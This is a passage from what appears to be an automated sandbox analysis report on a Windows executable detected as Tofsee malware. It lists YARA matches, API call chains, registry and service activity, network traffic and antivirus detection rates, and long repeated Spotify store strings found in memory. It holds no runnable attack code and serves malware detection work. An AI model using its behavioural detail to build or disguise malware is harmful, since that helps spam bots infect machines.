            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,0_2_00402A62
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
            Source: svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
            Source: svchost.exe, 0000001E.00000003.395641545.000001D6C5981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-06-23T07:49:46.8854719Z||.||e8626b3b-46b9-4258-ba94-c96e93c8d7ab||1152921505694968416||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
            Source: svchost.exe, 0000001E.00000003.395641545.000001D6C5981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-06-23T07:49:46.8854719Z||.||e8626b3b-46b9-4258-ba94-c96e93c8d7ab||1152921505694968416||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Yara detected Tofsee
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0.3.OcmKX57vR7.exe.af0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.3.pjzcupje.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b30e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
            Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0040C9130_2_0040C913
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_004188100_2_00418810
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_004274200_2_00427420
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_004195F00_2_004195F0
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_0040C91313_2_0040C913
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_0041881013_2_00418810
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_0042742013_2_00427420
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_004195F013_2_004195F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0251C91317_2_0251C913
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,0_2_00401280
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
            Source: OcmKX57vR7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.3.OcmKX57vR7.exe.af0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.3.pjzcupje.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b30e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ghrubsm\Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: String function: 0040EE2A appears 40 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: String function: 00402544 appears 53 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: String function: 00AD27AB appears 36 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,0_2_00408E26
            Source: OcmKX57vR7.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
            Source: OcmKX57vR7.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
            Source: OcmKX57vR7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-28013
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_13-19843
            Source: classification engineClassification label: mal100.troj.evad.winEXE@37/6@5/4
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,13_2_00409A6B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02519A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_02519A6B
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
            Source: OcmKX57vR7.exeVirustotal: Detection: 49%
            Source: OcmKX57vR7.exeMetadefender: Detection: 45%
            Source: OcmKX57vR7.exeReversingLabs: Detection: 84%
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile read: C:\Users\user\Desktop\OcmKX57vR7.exeJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\OcmKX57vR7.exe "C:\Users\user\Desktop\OcmKX57vR7.exe"
